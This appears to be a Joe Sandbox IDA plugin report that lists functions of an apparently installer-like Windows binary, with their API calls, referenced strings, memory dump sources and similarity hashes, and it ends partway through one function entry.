String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
API String ID: 2241679041-1583736410
Opcode ID: 2c1c9d4c030310ce9e28bd9a9ae11ded1a3a1425a35f5c0b26896a81ef172b16
Instruction ID: 7a0efa6471646e3a80072d21ed44f15c64d6fc26d71e4f3a9a9c49eb9f765b08
Opcode Fuzzy Hash: 2c1c9d4c030310ce9e28bd9a9ae11ded1a3a1425a35f5c0b26896a81ef172b16
Instruction Fuzzy Hash: 4641C571A5021BEADF205BE5DC8FFBF7A68AB04741F1A003DF915E7091D7648E0487A1

Function 00CC7C27 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 184encryptionfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC7C7E
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000000,F0000040,00000000,?,00000000,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000), ref: 00CC7CA3
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7CAD
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000), ref: 00CC7CE9
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7CF3
CryptHashData.ADVAPI32(?,?,?,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?), ref: 00CC7D44
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000), ref: 00CC7D69
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7D6F
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000), ref: 00CC7DAB
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7DB5
SetFilePointerEx.KERNEL32(?,?,?,?,00000001,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000), ref: 00CC7DFE
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7E08
GetLastError.KERNEL32(?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7E2F
CryptDestroyHash.ADVAPI32(?,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 00CC7E6E
CryptReleaseContext.ADVAPI32(?,00000000,?,00CA9C6F,00000000,00000001,?,?,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00CC7E83

Strings

cryputil.cpp, xrefs: 00CC7E54

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease_memset
String ID: cryputil.cpp
API String ID: 961722652-2185294990
Opcode ID: 5d31b5f24021ea89dbedf2290e624a56c1054c75167512752d398e934b8a289e
Instruction ID: 540865377075a96f5266b7b8ec44697b62c8ef76eda986002e1d12689588a5c0
Opcode Fuzzy Hash: 5d31b5f24021ea89dbedf2290e624a56c1054c75167512752d398e934b8a289e
Instruction Fuzzy Hash: 87519372A0425AAFEB214B65CC85FEA77B8EF08701F1041BDF659E5150D7B88EC4AF50

Function 00C935AD Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 174pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00C935DA
GetLastError.KERNEL32(00000000,00C917A9,00C9BDAF,00C9130D,?), ref: 00C935E3
CreateNamedPipeW.KERNEL32(00C9130D,00080003,00000000,00000001,00010000,00010000,00000001,?,00C9130D,00000000,00C917A9,00C9BDAF,00C9130D,?), ref: 00C93696
GetLastError.KERNEL32 ref: 00C936A0
CloseHandle.KERNEL32(?,pipe.cpp,0000014E,000000FF), ref: 00C93726
LocalFree.KERNEL32(?,00C9130D), ref: 00C93746
CreateNamedPipeW.KERNEL32(00C9130D,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 00C93761
GetLastError.KERNEL32 ref: 00C93768

Strings

Failed to create the security descriptor for the connection event and pipe., xrefs: 00C93617
Failed to allocate full name of cache pipe: %ls, xrefs: 00C93715
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00C935D5
Failed to allocate full name of pipe: %ls, xrefs: 00C9365B
Failed to create pipe: %ls, xrefs: 00C936D7, 00C9379F
pipe.cpp, xrefs: 00C9360D, 00C936CA, 00C93792
\\.\pipe\%ls, xrefs: 00C93644
\\.\pipe\%ls.Cache, xrefs: 00C936FB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: e9454a6e31011df2398b3b1e6733f7ce4a7aa5dfb56bb90519c02faf20dc28e9
Instruction ID: d3a1ace513fc7ff24c59c78976a2ac2cdf79d642a10a5b475c26b07fd06e8635
Opcode Fuzzy Hash: e9454a6e31011df2398b3b1e6733f7ce4a7aa5dfb56bb90519c02faf20dc28e9
Instruction Fuzzy Hash: EA5159B1E4024AFADF119FE5CD8AFAEBBB4EF04300F204069F514E6191E7758B40AB50

Function 00CB6FC7 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 148filenetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC5CB1: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CC5CC7
Part of subcall function 00CC5CB1: GetLastError.KERNEL32(?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CA9C6F,00000000,00000001,?), ref: 00CC5CD1

InternetReadFile.WININET(?,00000000,?,?), ref: 00CB7009
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CB7038

Strings

Failed to write data from internet., xrefs: 00CB7153
Failed to seek to start point in file., xrefs: 00CB6FE9, 00CB7075
downloadengine.cpp, xrefs: 00CB710B, 00CB7149
Failed while reading from internet., xrefs: 00CB7115
UX aborted on cache progress., xrefs: 00CB715A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: File$ErrorInternetLastPointerReadWrite
String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$downloadengine.cpp
API String ID: 1734627056-3175886020
Opcode ID: e891d76e57b580e6b11ed03957bb1758c2b2ff09f1f075e1c95adc6f9d359f12
Instruction ID: 26cc1a49db003a3a6db1f76cc97076cce3ee6a5e112f86630fa267e7aaece185
Opcode Fuzzy Hash: e891d76e57b580e6b11ed03957bb1758c2b2ff09f1f075e1c95adc6f9d359f12
Instruction Fuzzy Hash: 98415B72A4420AFFDF109FA4DC85EAE7BB9EF44301F24452EFA25E2150D7319A50AB20

Function 00C998DB Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00C99906
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00C99921
GetLastError.KERNEL32 ref: 00C9992A
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,?,?,?), ref: 00C99983
GetLastError.KERNEL32 ref: 00C99989

Strings

Failed to allocate the buffer for the Date., xrefs: 00C9996D
Failed to set variant value., xrefs: 00C999CE
Failed to get the required buffer length for the Date., xrefs: 00C99954
Failed to get the Date., xrefs: 00C999B3
variable.cpp, xrefs: 00C9994A, 00C999A9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: dc9223fc70dbd478cd7f243564da0a315f44736ff8a193d455d7f165dfd8200e
Instruction ID: a62b92de285c0a3b1050b720bdd06c1b3c3d2617416b2be8c6e652ab1b8fac18
Opcode Fuzzy Hash: dc9223fc70dbd478cd7f243564da0a315f44736ff8a193d455d7f165dfd8200e
Instruction Fuzzy Hash: 3031A271A4020AAAEF01AAE9DCC6FBF7BB8EB18705F11003EF605E6191D6749D449B91

Function 00CC019C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

LookupAccountNameW.ADVAPI32(00000000,000000FF,?,?,00000000,000000FF,?), ref: 00CC0213
GetLastError.KERNEL32 ref: 00CC0223
GetLastError.KERNEL32(?,00000044,00000001), ref: 00CC0245

Strings

aclutil.cpp, xrefs: 00CC01CE, 00CC02EB
D, xrefs: 00CC022E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHeapLast$AccountAllocateLookupNameProcess
String ID: D$aclutil.cpp
API String ID: 1410359055-2185417647
Opcode ID: dff3700462718e2b3f401a334936f46555f08c949963acb1dd701ca1255c6754
Instruction ID: 85a97119bd26ac4c59d4de04c6107802ab051ea9c1c55634ecab8b7e48b5ad79
Opcode Fuzzy Hash: dff3700462718e2b3f401a334936f46555f08c949963acb1dd701ca1255c6754
Instruction Fuzzy Hash: DF417C72D4022BFBDF219AD4CC49FAEBBB8AF04754F244169E920F6151D674CF44AB90

Function 00CA8E6E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112filestringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA8EA7
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,.unverified,?,?,?), ref: 00CA8F20
lstrlenW.KERNEL32(?,?,?), ref: 00CA8F47
FindNextFileW.KERNEL32(00000000,00000010,?,?), ref: 00CA8FA9
FindClose.KERNEL32(00000000,?,?), ref: 00CA8FB8

Part of subcall function 00CC6D15: _memset.LIBCMT ref: 00CC6D8A
Part of subcall function 00CC6D15: _memset.LIBCMT ref: 00CC6D98
Part of subcall function 00CC6D15: GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00CC6DA1
Part of subcall function 00CC6D15: GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6DBC

Strings

*.*, xrefs: 00CA8EFB
.unverified, xrefs: 00CA8EB6

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FileFind_memset$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 2873512992-2528915496
Opcode ID: f42bd9b6e3ee67ae0a32cb5e787373c3273ca3e96ca40cae5ce9c1476ec2d4e9
Instruction ID: 7fde8fea6226e3f2b37dad8b945df38d440b32ae488788a2fb6309d1ca2e01c4
Opcode Fuzzy Hash: f42bd9b6e3ee67ae0a32cb5e787373c3273ca3e96ca40cae5ce9c1476ec2d4e9
Instruction Fuzzy Hash: D341963190056EAFDF20AFA4DC49FAEB779AF45719F5001EAE505B1090DB748EC89F14

Function 00CA8558 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptHashPublicKeyInfo.CRYPT32(00000000,00008004,00000000,00000001,?,?,00000014), ref: 00CA85C7
GetLastError.KERNEL32 ref: 00CA8663

Strings

Failed to get certificate public key identifier., xrefs: 00CA8692
cache.cpp, xrefs: 00CA8688
Failed to find expected public key in certificate chain., xrefs: 00CA86AB
Failed to read certificate thumbprint., xrefs: 00CA8699

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CryptErrorHashInfoLastPublic
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 823482589-3408201827
Opcode ID: 53dece804770877f9671e6adfb83da40dacf0b43546de73ba700fcf9dd864b51
Instruction ID: f3cb91aa7bf134d2c5b147be939e59110f065e644b9a5f68f8a8fb922c1c9935
Opcode Fuzzy Hash: 53dece804770877f9671e6adfb83da40dacf0b43546de73ba700fcf9dd864b51
Instruction Fuzzy Hash: 83418C71E4021ADFEB10CF64C884EAEB7B4FF09319F154119F925AB291DB34AD49CB94

Function 00CBF805 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00CE7E3C,00000000,00000000,00000000), ref: 00CBF83B
GetCurrentProcessId.KERNEL32 ref: 00CBF84A
GetCurrentThreadId.KERNEL32 ref: 00CBF853
GetLocalTime.KERNEL32(?), ref: 00CBF869
LeaveCriticalSection.KERNEL32(00CE7E3C,?,?,00000000,0000FDE9), ref: 00CBF963

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00CBF908

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: bfa0ab0db99b8d615253577ff6830dde141a98d89d3757cbd616f98aa763c917
Instruction ID: 5cda86546347eba579411b957a8592fd641fc7e9bbd937758f6f3d5e0f6a657d
Opcode Fuzzy Hash: bfa0ab0db99b8d615253577ff6830dde141a98d89d3757cbd616f98aa763c917
Instruction Fuzzy Hash: D5416A72E00249AFCF109FE5DC85BFEB7B9AB48311F14403EE611A72A0D6358E46D7A0

Function 00CB851A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00CBA5BF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CBA5D4
UnhandledExceptionFilter.KERNEL32(00CE0AD0), ref: 00CBA5DF
GetCurrentProcess.KERNEL32(C0000409), ref: 00CBA5FB
TerminateProcess.KERNEL32(00000000), ref: 00CBA602

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: ca52047d520d50146a95d64cf45e31826bcbf1a956830bf62561f9f30af76efd
Instruction ID: fa405ace93f769066825ce3efe50375e17e11479ada627ba5f97bf15d1503196
Opcode Fuzzy Hash: ca52047d520d50146a95d64cf45e31826bcbf1a956830bf62561f9f30af76efd
Instruction Fuzzy Hash: 9621FCB480A3848FD715DF69FCCAB5C3BA4FF08301F10566AE5199B662E7B45A81CF05

Function 00CC8581 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00CE1FAC,?), ref: 00CC85D6
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00CC85E8

Strings

%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 00CC8630
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00CC85BF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
API String ID: 1772835396-395410266
Opcode ID: 1143a755dc67895d1878d1a9a330cbdbf17af3f6ac2a182c726143388f525d5d
Instruction ID: 15d22b0378d839f2bd7e531395ee4cde024e2c5842310921bd3f4b509db33609
Opcode Fuzzy Hash: 1143a755dc67895d1878d1a9a330cbdbf17af3f6ac2a182c726143388f525d5d
Instruction Fuzzy Hash: 4B21F8A2900128AADB24DF9ACC05FBFB3FCAB4C701F00455AF945E2080E778AA84D770

Function 00CBF996 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00CBFB57,00000000,?,00000000,?,00000001), ref: 00CBF9B5
GetLastError.KERNEL32(?,00CBFB57,00000000,?,00000000,?,00000001,?,00C9157A,00000000,00000000,00000000,?,?,00CA949F,00000002), ref: 00CBF9BF
LocalFree.KERNEL32(00000000,00000000,?,00000000,?,00CBFB57,00000000,?,00000000,?,00000001,?,00C9157A,00000000,00000000,00000000), ref: 00CBFA2A

Strings

logutil.cpp, xrefs: 00CBF9DF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: f3fca7a127957f3987de8f9d21ad22f2bc22f59b8e7ae43fb9f051a6071dc00e
Instruction ID: dd3b6b696b5b9ccb95efc70c8cc36977c6b2ed9e26f261f6ea0e44ad26d5c0b1
Opcode Fuzzy Hash: f3fca7a127957f3987de8f9d21ad22f2bc22f59b8e7ae43fb9f051a6071dc00e
Instruction Fuzzy Hash: F6118C36600209EBDB21CFA5DD46FEF3779EB85710F244029F515E62A1D7328E52E760

Function 00CA86D9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to calculate working folder to ensure it exists., xrefs: 00CA86F6
Failed to copy working folder., xrefs: 00CA8734
Failed create working folder., xrefs: 00CA870C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastPathTemp_memset
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 623060366-2072961686
Opcode ID: 5e1343f86a96535e8863341779958f77211d7419c5d00d9f54224755f413b7a4
Instruction ID: 3efe1be6f4d9955d07a6da6d3b8ab49f704355615a25c1c300cf85d3020802d6
Opcode Fuzzy Hash: 5e1343f86a96535e8863341779958f77211d7419c5d00d9f54224755f413b7a4
Instruction Fuzzy Hash: 7F018472900119FFDF10BE95DDC6D9DB7A8DA12358731417AF601B6150EE314F44B691

Function 00CAEDA9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(?,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,?,00CAEFDF,?), ref: 00CAEDC3
GetLastError.KERNEL32(?,00CAEFDF,?,00000003,?,?), ref: 00CAEDCD

Strings

Failed to set service start type., xrefs: 00CAEDFC
msuengine.cpp, xrefs: 00CAEDF2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuengine.cpp
API String ID: 1456623077-1628545019
Opcode ID: f7c35115234b935e5c9da44e08ca1dfb42359e98d9b769d2dea4b5ce5f0c8a1b
Instruction ID: e98c18345acd32bfffee12e8fe2563b36ae7f122be9ed78ad0b1228bb1232e51
Opcode Fuzzy Hash: f7c35115234b935e5c9da44e08ca1dfb42359e98d9b769d2dea4b5ce5f0c8a1b
Instruction Fuzzy Hash: B5F0A73238412AB68720265ADC0EF5F7E69DBC2B71B22023DF53CD61D0EE258D01A1E4

Function 00CC5D81 Relevance: 4.5, APIs: 3, Instructions: 43fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC5DAC
FindFirstFileW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CC5DBC
FindClose.KERNEL32(00000000), ref: 00CC5DC8

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst_memset
String ID:
API String ID: 3141757445-0
Opcode ID: 8582747a31dc15e009851c8df84a659d49c6cc2d21dc28d4c8087d400b5c6d47
Instruction ID: 833e5480d42ac49260b6e9eec6cc9695064b9f4ba1ffb437f94654a11325a1ab
Opcode Fuzzy Hash: 8582747a31dc15e009851c8df84a659d49c6cc2d21dc28d4c8087d400b5c6d47
Instruction Fuzzy Hash: 6D018672B00608ABDB11EFE8DDC9EAEB3ACEB44319F000169E915D7180D674AE498B50

Function 00CC6B8A Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

